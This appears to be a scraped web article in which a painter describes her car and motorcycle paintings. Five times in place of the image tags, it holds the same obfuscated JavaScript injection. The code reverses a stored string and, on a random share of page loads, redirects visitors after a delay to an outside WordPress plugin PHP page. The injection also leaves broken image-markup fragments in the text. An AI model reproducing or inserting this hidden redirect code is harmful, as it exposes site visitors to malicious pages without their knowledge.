Within each car and for each painting, I recognize a personal feeling, a character or an emotion which is resounding in her (not ‘it’, her), or which has spoken deeply to me. You can tell when an owner takes good care of his/her car, and it’s these moments – when I feel the love and respect between the two – that really speaks to me. It really helps with the flow of the piece.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/Cathy-Deniset-Artiste-Peintre-13.jpg” width=”728″ height=”368″ />

Then at the end, I add the light to the picture with a round brush. The piece usually takes between five and six hours depending on the canvas size, and seeing the painting come alive at that moment is the most rewarding part for me.

I’m very proud of all my work, since each gets the same respect as the other from me. But there are a few examples that are quite dear to my heart:

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/Cathy-Deniset-Artiste-Peintre-4.jpg” width=”728″ height=”363″ />

Not too long ago, a friend of mine was in a race driving a Renault Clio Sport, and then in another in an Aston Martin Vantage. But I found more people were following this Mustang and the unbelievable noise coming from the engine. I took this picture at the end of the race when she was tired and race-worn. Not an overall winner but a strong fighter, and I felt she deserved her time in the spotlight.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/Cathy-Deniset-Artiste-Peintre-2.jpg” width=”728″ height=”530″ />

I felt really attached to this 354 when I stumbled across her. It was just after a very difficult part of my life, and she was just like me: drained, without colour and in need of repair. But she was ready to face life with the wounds she’d been dealt, and I took a lot of strength from that.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/Cathy-Deniset-Artiste-Peintre-3.jpg” width=”728″ height=”989″ />

And this was a private moment with a Harley Davidson. I was so close to the engine, and in that way it felt very intimate. The reflection on the pipes and the seat leather felt so raw, and so real. It was exciting.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/Cathy-Deniset-Artiste-Peintre-10.jpg” width=”728″ height=”477″ />

I know I won’t ever get bored painting these amazing machines. Each has a story to tell and a personality to share, and I try my best to honour that. At the moment I’m painting the spoiler of a Nissan GTR, but who knows where my next source of inspiration will come from. If any of you crankandpiston fans by any chance have an SLS, then you know where to find me!
